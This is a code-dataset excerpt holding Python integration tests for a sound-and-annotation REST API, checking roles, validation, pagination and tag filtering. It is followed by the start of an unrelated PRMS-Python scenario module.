user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(sound_data['info_url'], sound_resp.json()['info_url'])
def test_created_by_user_name_is_included(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(
user1['user_name'], sound_resp.json()['created_by_user_name'])
def test_can_create_sound_with_low_quality_url(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
audio_url = 'https://example.com/audio.wav'
low_quality_audio_url = 'https://example.com/audio.mp3'
sound_data = self.sound_data(
audio_url=audio_url,
low_quality_audio_url=low_quality_audio_url)
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(audio_url, sound_resp.json()['audio_url'])
self.assertEqual(
low_quality_audio_url, sound_resp.json()['low_quality_audio_url'])
def test_cannot_create_duplicate_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CONFLICT, resp.status_code)
def test_location_header_is_returned_when_creating_duplicate_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
expected_location = resp.headers['location']
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CONFLICT, resp.status_code)
self.assertEqual(expected_location, resp.headers['location'])
def test_featurebot_cannot_create_sound(self):
user1, user1_location = self.create_user(user_type='featurebot')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_aggregator_cannot_create_sound(self):
user1, user1_location = self.create_user(user_type='aggregator')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_unauthorized_when_creating_sound_anonymously(self):
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data)
self.assertEqual(client.UNAUTHORIZED, resp.status_code)
def test_bad_request_for_bad_info_url(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(info_url='blah')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_bad_audio_url(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(audio_url='blah')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_bad_license_type(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(license_type='blah')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_missing_title(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data(title='')
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_for_missing_duration(self):
user1, user1_location = self.create_user()
auth = self._get_auth(user1)
sound_data = self.sound_data()
del sound_data['duration_seconds']
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_explicit_created_by_is_ignored(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
sound_data['created_by'] = '1234'
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(user1_location, sound_resp.json()['created_by'])
def test_user_is_returned_as_uri(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
self.assertEqual(client.OK, sound_resp.status_code)
self.assertEqual(user1_location, sound_resp.json()['created_by'])
def test_sound_includes_link_to_annotations(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.get(self.url(sound_location), auth=auth)
links = {link['rel']: link for link in sound_resp.json()['links']}
self.assertIn('annotations', links)
def test_can_head_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.head(self.url(sound_location), auth=auth)
self.assertEqual(client.NO_CONTENT, sound_resp.status_code)
def test_unauthorized_when_getting_sound_anonymously(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.head(self.url(sound_location))
self.assertEqual(client.UNAUTHORIZED, sound_resp.status_code)
def test_sounds_are_immutable(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.patch(
self.url(sound_location),
json={'info_url': 'https://example.com'},
auth=auth)
self.assertEqual(client.METHOD_NOT_ALLOWED, sound_resp.status_code)
def test_cannot_delete_sound(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
sound_data = self.sound_data()
resp = requests.post(self.sounds_resource(), json=sound_data, auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
sound_location = resp.headers['location']
sound_resp = requests.delete(self.url(sound_location), auth=auth)
self.assertEqual(client.METHOD_NOT_ALLOWED, sound_resp.status_code)
def test_can_list_sounds(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 93)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 10},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
resp_data = resp.json()
self.assertEqual(10, len(resp_data['items']))
self.assertEqual(93, resp_data['total_count'])
items = [resp_data['items']]
while 'next' in resp_data:
current = requests.get(
self.url(resp_data['next']),
auth=auth)
resp_data = current.json()
items.append(resp_data['items'])
self.assertEqual(10, len(items))
self.assertEqual(3, len(items[-1]))
self.assertEqual(93, sum(len(item) for item in items))
def test_can_list_sounds_by_user_id(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
        user2_id = user2_location.split('/')[-1]
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 10, 'created_by': user2_id},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_list_sounds_by_tag(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5, tags=['test'])
self._create_sounds_with_user(auth, 5, tags=['train'])
resp = requests.get(
self.sounds_resource(),
params={'page_size': 10, 'tags': 'test'},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
def test_can_stream_sounds_by_user_id(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
        user2_id = user2_location.split('/')[-1]
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 2, 'created_by': user2_id},
auth=auth)
items = resp.json()['items']
self.assertEqual(2, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
low_id = items[-1]['id']
resp = requests.get(
self.sounds_resource(),
params={
'page_size': 100,
'created_by': user2_id,
'low_id': low_id
},
auth=auth)
items = resp.json()['items']
self.assertEqual(3, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_supports_something_stream_like(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 10, delay=0.1)
resp = requests.get(
self.sounds_resource(),
params={'page_size': 5},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(5, len(resp.json()['items']))
self.assertEqual(10, resp.json()['total_count'])
low_id = resp.json()['items'][-1]['id']
resp = requests.get(
self.sounds_resource(),
params={
'page_size': 10,
'low_id': low_id
},
auth=auth)
self.assertEqual(client.OK, resp.status_code)
self.assertEqual(5, resp.json()['total_count'])
self.assertEqual(5, len(resp.json()['items']))
class UserSoundTests(BaseTests, unittest2.TestCase):
def test_not_found_for_nonexistent_user(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
resp = requests.get(
self.user_sounds_resource('BAD_USER_ID'),
params={'page_size': 10},
auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_list_all_sounds_from_user(self):
user1, user1_location = self.create_user(user_type='dataset')
auth = self._get_auth(user1)
self._create_sounds_with_user(auth, 5)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
user2_id = user2_location.split('/')[-1]
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.user_sounds_resource(user2_id),
params={'page_size': 10},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
user_uri = f'/users/{user2_id}'
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_stream_user_sounds_using_low_id(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
user_id = user_location.split('/')[-1]
self._create_sounds_with_user(auth, 10)
user2, user2_location = self.create_user(user_type='dataset')
auth2 = self._get_auth(user2)
self._create_sounds_with_user(auth2, 5)
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 3},
auth=auth)
items = resp.json()['items']
low_id = items[-1]['id']
resp = requests.get(
self.user_sounds_resource(user_id),
params={
'page_size': 100,
'low_id': low_id
},
auth=auth)
user_uri = f'/users/{user_id}'
items = resp.json()['items']
self.assertEqual(7, len(items))
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_filter_by_sound_tags(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
user_id = user_location.split('/')[-1]
self._create_sounds_with_user(auth, 10, tags=['train'])
self._create_sounds_with_user(auth, 11, tags=['validation'])
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'train'},
auth=auth)
items = resp.json()['items']
self.assertEqual(10, len(items))
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'validation'},
auth=auth)
items = resp.json()['items']
self.assertEqual(11, len(items))
def test_sound_tag_filtering_is_implicit_and(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
user_id = user_location.split('/')[-1]
self._create_sounds_with_user(auth, 10, tags=['train'])
self._create_sounds_with_user(auth, 11, tags=['validation'])
self._create_sounds_with_user(auth, 5, tags=['train', 'validation'])
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'train'},
auth=auth)
items = resp.json()['items']
self.assertEqual(15, len(items))
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': 'validation'},
auth=auth)
items = resp.json()['items']
self.assertEqual(16, len(items))
resp = requests.get(
self.user_sounds_resource(user_id),
params={'page_size': 100, 'tags': ['validation', 'train']},
auth=auth)
items = resp.json()['items']
self.assertEqual(5, len(items))
class UserAnnotationTests(BaseTests, unittest2.TestCase):
def test_not_found_for_nonexistent_user(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.user_annotations_resource('BAD_USER_ID'), auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_filter_user_annotations_by_tag(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
fb_id = fb_location.split('/')[-1]
annotation_data = [
self.annotation_data(tags=['drums']) for i in range(3)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
annotation_data = [
self.annotation_data(tags=['snare']) for i in range(4)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
user_uri = f'/users/{fb_id}'
resp = requests.get(
self.user_annotations_resource(fb_id),
params={'tags': 'drums'},
auth=auth)
items = resp.json()['items']
self.assertEqual(3, len(items))
def test_can_list_all_annotations_for_user(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
fb_id = fb_location.split('/')[-1]
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(3)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
user_uri = f'/users/{fb_id}'
resp = requests.get(
self.user_annotations_resource(fb_id),
auth=auth)
items = resp.json()['items']
self.assertEqual(3, len(items))
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
def test_can_stream_user_annotations_using_low_id(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
fb_id = fb_location.split('/')[-1]
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(40)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=fb_auth)
resp = requests.get(
self.user_annotations_resource(fb_id),
params={'page_size': 11},
auth=auth)
items = resp.json()['items']
self.assertEqual(11, len(items))
low_id = items[-1]['id']
resp = requests.get(
self.user_annotations_resource(fb_id),
params={
'page_size': 100,
'low_id': low_id
},
auth=auth)
user_uri = f'/users/{fb_id}'
items = resp.json()['items']
self.assertEqual(29, len(items))
self.assertTrue(all([item['created_by'] == user_uri for item in items]))
class AnnotationsTests(BaseTests, unittest2.TestCase):
def tearDown(self):
self.delete_all_data()
def test_can_exclude_sounds_with_no_tags(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='featurebot')
auth2 = self._get_auth(user2)
annotation_data2 = [
self.annotation_data(data_url='http://example.com/1'),
self.annotation_data(data_url='http://example.com/2')
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data2},
auth=auth2)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'with_tags': True},
auth=auth)
items = resp.json()['items']
self.assertEqual(2, len(items))
def test_can_search_for_annotations_by_tag_with_pound_sign(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['musical_note:A#4'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['musical_note:A#4']},
auth=auth)
items = resp.json()['items']
self.assertEqual(1, len(items))
def test_can_search_across_sounds_by_tag(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='human')
auth2 = self._get_auth(user2)
sound_id2 = self._create_sound_with_user(auth2)
annotation_data2 = [
self.annotation_data(tags=['kick']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id2),
json={'annotations': annotation_data2},
auth=auth)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['snare']},
auth=auth)
items = resp.json()['items']
self.assertEqual(2, len(items))
def test_can_list_annotations_from_most_to_least_recent(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='human')
auth2 = self._get_auth(user2)
sound_id2 = self._create_sound_with_user(auth2)
annotation_data2 = [
self.annotation_data(tags=['kick']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id2),
json={'annotations': annotation_data2},
auth=auth)
resp1 = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['snare']},
auth=auth)
items1 = resp1.json()['items']
resp2 = requests.get(
self.annotations_resource(),
params={'page_size': 100, 'tags': ['snare'], 'order': 'desc'},
auth=auth)
items2 = resp2.json()['items']
self.assertSequenceEqual(items1, items2[::-1])
def test_tags_should_be_formatted_correctly_in_next_link(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=['drums']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
user2, user2_location = self.create_user(user_type='human')
auth2 = self._get_auth(user2)
sound_id2 = self._create_sound_with_user(auth2)
annotation_data2 = [
self.annotation_data(tags=['kick']),
self.annotation_data(tags=['snare'])
]
requests.post(
self.sound_annotations_resource(sound_id2),
json={'annotations': annotation_data2},
auth=auth)
resp = requests.get(
self.annotations_resource(),
params={'page_size': 1, 'tags': ['snare']},
auth=auth)
self.assertIn('tags=snare', resp.json()['next'])
class AnnotationTests(BaseTests, unittest2.TestCase):
def tearDown(self):
self.delete_all_data()
def test_can_filter_annotations_by_creating_user(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
user2, user2_location = self.create_user(user_type='featurebot')
auth2 = self._get_auth(user2)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
annotation_data = self.annotation_data(tags=['snare'])
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth2)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={
'created_by': user2_location.split('/')[-1],
'page_size': 10
},
auth=auth)
items = resp.json()['items']
self.assertEqual(1, len(items))
self.assertEqual('snare', items[0]['tags'][0])
def test_annotations_resource_supports_cors(self):
resp = requests.options(self.sounds_resource('blah'))
self.assertIn('Access-Control-Allow-Origin', resp.headers)
def test_human_can_create_annotation(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_created_by_user_name_is_included(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
results = requests.get(
self.sound_annotations_resource(sound_id), auth=auth)
item = results.json()['items'][0]
self.assertEqual(
user['user_name'], item['created_by_user_name'])
def test_featurebot_can_create_annotation(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
fb, fb_location = self.create_user(user_type='featurebot')
fb_auth = self._get_auth(fb)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=fb_auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_dataset_can_create_annotation(self):
user, user_location = self.create_user(user_type='dataset')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_aggregator_cannot_create_annotation(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
fb, fb_location = self.create_user(user_type='aggregator')
fb_auth = self._get_auth(fb)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=fb_auth)
self.assertEqual(client.FORBIDDEN, resp.status_code)
def test_can_create_multiple_annotations_at_once(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_cannot_create_annotation_for_nonexistent_sound(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(tags=['drums'])
resp = requests.post(
self.sound_annotations_resource(sound_id + 'WRONG'),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_list_annotations_for_a_sound(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
auth=auth)
self.assertEqual(10, len(resp.json()['items']))
def test_can_filter_sound_annotations_by_tag(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={'tags': 'drums0', 'page_size': 100},
auth=auth)
self.assertEqual(1, len(resp.json()['items']))
def test_can_exclude_sound_annotations_without_tags(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
self.annotation_data(tags=[f'drums{i}']) for i in range(10)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
annotation_data = [
self.annotation_data() for _ in range(11)]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={'with_tags': True, 'page_size': 100},
auth=auth)
self.assertEqual(10, len(resp.json()['items']))
def test_can_filter_annotations_for_sound_overlapping_with_range(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = [
# full-duration
self.annotation_data(start_seconds=0,
duration_seconds=(6 * 60) + 42),
# completely before range
self.annotation_data(start_seconds=0, duration_seconds=4),
# end overlaps with range
self.annotation_data(start_seconds=1, duration_seconds=5),
# totally within range
self.annotation_data(start_seconds=6, duration_seconds=1),
# beginning overlaps with range
self.annotation_data(start_seconds=9, duration_seconds=5),
# completely after range
self.annotation_data(start_seconds=11, duration_seconds=5)
]
requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
resp = requests.get(
self.sound_annotations_resource(sound_id),
params={'time_range': '5-10'},
auth=auth)
items = resp.json()['items']
self.assertEqual(4, len(items))
def test_not_found_when_listing_annotations_for_nonexistent_sound(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
resp = requests.get(
self.sound_annotations_resource('WRONG'),
auth=auth)
self.assertEqual(client.NOT_FOUND, resp.status_code)
def test_can_create_annotation_with_external_data_url(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(data_url='https://example.com')
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
def test_no_annotations_are_created_when_one_is_invalid(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
def data_url(i):
return 'WRONG' if i == 0 else 'https://example.com'
annotation_data = \
[self.annotation_data(data_url=data_url(i)) for i in range(10)]
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': annotation_data},
auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_creating_annotation_with_invalid_data_url(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(data_url='WRONG')
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_bad_request_when_no_annotations_are_provided(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(
data_url='https://example.com', start_seconds=0)
resp = requests.post(
self.sound_annotations_resource(sound_id),
json=annotation_data,
auth=auth)
self.assertEqual(client.BAD_REQUEST, resp.status_code)
def test_can_create_annotation_with_start_seconds_of_zero(self):
user, user_location = self.create_user(user_type='human')
auth = self._get_auth(user)
sound_id = self._create_sound_with_user(auth)
annotation_data = self.annotation_data(
data_url='https://example.com', start_seconds=0)
resp = requests.post(
self.sound_annotations_resource(sound_id),
json={'annotations': [annotation_data]},
auth=auth)
self.assertEqual(client.CREATED, resp.status_code)
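# Note added for clarity: the tests above depend on helpers defined earlier in
# this test class (`create_user`, `_get_auth`, `_create_sound_with_user`,
# `sound_annotations_resource` and `annotation_data`).  Judging only from how
# it is called here, `annotation_data` presumably builds a request payload
# along these lines (hypothetical sketch, field names inferred from the
# keyword arguments used above):
#
#     def annotation_data(self, tags=None, data_url='', start_seconds=1,
#                         duration_seconds=1):
#         return {
#             'tags': tags or [],
#             'data_url': data_url,
#             'start_seconds': start_seconds,
#             'duration_seconds': duration_seconds,
#         }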
``` |
{
"source": "JohnVolk/PRMS-Python",
"score": 3
} |
#### File: PRMS-Python/prms_python/scenario.py
```python
import inspect
import json
import multiprocessing as mp
import os
import shutil
import uuid
from datetime import datetime
from .parameters import modify_params, Parameters
from .data import Data
from .util import load_statvar
from .simulation import Simulation
class ScenarioSeries(object):
"""
Create and manage a series of model runs where parameters are modified.
First initialize the series with an optional title and description.
Then to build the series the user provides a list of dictionaries with
parameter-function key-value pairs, and optionally a title and
description for each dictionary defining the individual scenario.
The ScenarioSeries' ``build`` method creates a file structure under
the series directory (``scenarios_dir``) where each subdirectory is
named with a :mod:`uuid` which can be later matched to its title using
the metadata in ``scenario_dir/series_metadata.json`` (see :mod:`json`).
In the future we may add a way for the user to access the results of
the scenario simulations directly through the ``ScenarioSeries``
instance, but for now the results are written to disk. Therefore each
scenario's title metadata can be used to track which parameters were
modified and how for post-processing and analysis. One could also use
the description metadata for this purpose.
Arguments:
base_dir (str): path to base inputs; 'control', 'parameters',
